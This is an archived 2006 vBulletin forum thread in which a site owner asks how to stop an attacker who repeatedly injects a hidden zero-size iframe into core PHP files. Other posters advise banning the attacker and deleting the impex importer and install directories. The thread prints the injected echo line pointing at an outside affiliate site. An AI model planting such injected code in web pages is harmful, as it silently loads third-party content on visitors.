vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   Forum keeps getting hacked (https://vborg.vbsupport.ru/showthread.php?t=122756)

gbechtel 08-01-2006 07:51 PM
Forum keeps getting hacked
 
I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.

PHP Code:
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>"
It is usually placed at the bottom of the php file. like in forumdisplay.php

PHP Code:
$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], truefalse);
$show['forumslist'] = iif ($forumshowntruefalse);
$show['stickies'] = iif ($threadbits_sticky != ''truefalse);
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

($hook vBulletinHook::fetch_hook('forumdisplay_complete')) ? eval($hook) : false
The code messes up the template and creates a number of pop-ups.

It's simple enough to fix but I want to prevent it from happening again, seems every three days or so it is back.

Can I just chmod these files or will that mess up the board even more?

Thanks,
Gil

http://www.masscops.com/forums/police_portal_index.php?

davidw 08-01-2006 08:41 PM
You should be able to chmod them 644 I believe

bondjetta 08-01-2006 08:49 PM
Quote:
Originally Posted by christianb
You should be able to chmod them 644 I believe
mine are 644'd and i'm showing similar signs of this same dude on both AutomotiveArena.com and WorkSafeBoredom.com

gbechtel 08-01-2006 09:12 PM
Yeah mine are already 644 also. Would 444 be an option?

Gonna try it and see what happens.

UPDATE:

Ok the 444 seems to be working for the time, don't know if the lil twit has tried it again or not but how was he able to do this in the first place?

I am not a security expert by any means but I think my vB is pretty secure. (renamed admin folders, htaccess etc...)

Is this some type of mysql injection or something?

gbechtel 08-04-2006 07:54 PM
The chmod 444 did not stop the lil twit.

On top of that the files that I did a chmod on were reverted back to 644.

Another interesting item, today just before I got hacked I had a new user join the forum.

IP Address used was 201.17.220.203

Quote:
There is a new user, bunda at MassCops - Massachusetts Law Enforcement Network

To view their profile, go here:

http://www.masscops.com/forums/member.php?u=4212

Email Address : soauker@gmail.com
Birthday :
Is there anyway I can stop this guy????

davidw 08-04-2006 07:59 PM
IMO, he gave himself away (the assumption it is a he). If it were me, I would block the whole HOST IP range in the vbulletin and if you have a firewall, add it to the firewall.

gbechtel 08-04-2006 08:25 PM
Server co. says he is getting in through the impex directory....

davidw 08-04-2006 08:40 PM
Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup

gbechtel 08-04-2006 08:44 PM
already done, hope that was it...

davidw 08-04-2006 08:45 PM
Don't forget to ban his IP addresses though :P

rasp187 08-05-2006 02:12 AM
Heh, Impex should always be removed after you use it for reasons just like this. I hope it solved your problem. I took the liberty of banning his IP and email from my forums, too, just in case he happens to stumble upon them on google or something. Thanks for the heads up.

Nuguru 09-03-2006 08:43 PM
Quote:
Originally Posted by christianb
Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup

Hello,

Looks like great advice, but where is the impex file so that I can delete it? Also, now that I have 3.5.4 installed, can I delete the install directory that seems to have all the upgrade files in it?

Thank You for you Help!

Nuguru :)

Freesteyelz 09-03-2006 09:17 PM
The Impex files are located in a folder that's located in your forum root named "impex"; you can remove the entire directory. In your /includes remove the file "cpnav_impex.php".

As for your install directory remove "install.php" and all of the "upgrade.php" files or simply remove the directory itself.

Paul M 09-03-2006 09:17 PM
impex will be a directory called .... impex :)

you can delete the install directory.

Nuguru 09-03-2006 11:23 PM
Quote:
Originally Posted by Freesteyelz
The Impex files are located in a folder that's located in your forum root named "impex"; you can remove the entire directory. In your /includes remove the file "cpnav_impex.php".

As for your install directory remove "install.php" and all of the "upgrade.php" files or simply remove the directory itself.

Thank You for the Quick Reponse.


Nuguru

SportsZone 09-08-2006 03:12 PM
I have a file directory called "installer." Can i delete that file? I also just deleted my "install" directory...

I'm not sure if this file has anything to do with the 3.6 upgrade, although it has a file called "product-ucs.xml" within it. So could this be a Ucash installer file?


All times are GMT. The time now is 04:05 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01220 seconds
  • Memory Usage 1,757KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_php_printable
  • (4)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (16)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete